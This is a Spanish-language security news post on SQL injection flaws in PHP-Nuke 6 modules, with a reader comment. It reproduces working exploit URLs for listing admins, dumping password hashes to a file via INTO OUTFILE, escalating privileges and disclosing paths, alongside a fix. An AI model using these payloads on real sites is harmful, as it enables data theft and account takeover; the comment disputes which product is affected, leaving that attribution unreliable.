Problema de inyección de código SQL en PHPNuke

PHP-Nuke 6, el sistema de publicación basado en PHP muy popular entre los portales de Internet, es vulnerable a varios ataques de inyección de código que permitiría el acceso a datos sensibles y/o la manipulación de la base de datos. La vulnerabilidad está causada por un error de validación de entrada en los módulos “Members_List” y “Your_Account” y será únicamente explotable cuando php esté configurado con “magic_quotes_gpc=OFF” (normalmente en php.ini).Formas de explotar la vulnerabilidad según Hispasec

* Listado de moderadores:

http://[victima]/modules.php?name=Members_List&letter=’%20OR%20user_level=’2’/*

* Listado de administradores:

http://[victima]/modules.php?name=Members_List&letter=’%20OR%20user_level=’4’/*

* Creación de un archivo con todas los claves encriptadas:

http://[victima]/modules.php?name=Your_Account&op=mailpasswd&uname=’)%20OR%201=1%20INTO%20OUTFILE%20’/[directorio]/Claves.txt’/*

http://[victima]/Claves.txt

* Elevación de privilegios:

http://[victima]/modules.php?name=Your_Account&op=savehome&broadcast=’,user_level=’4&uid=[NUESTRO_UID]

* Revelación de directorio local:

http://[victima]/modules/Forums/bb_smilies.php

La solución más rápida a esta vulnerabilidad pasa pro editar el fichero php.ini y activar la opción “magic_quotes_gpc=ON”. Por otro lado ya estan disponible los parches de actualización y corrección en: http://www.phpnuke.org/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=342&ttitle=Security_Fixes_for_PHP-Nuke_6.0

Categorias: Internacional

Etiquetas:

2s Comentarios

  1. Segun Hispasec, el problema es de PostNuke, no de PHP-Nuke 😉

    Corregir la noticia si podeis, xq además el parche al que hace referencia tiene ya bastante tiempo y era para corregir una vulnerabilidad de php-nuke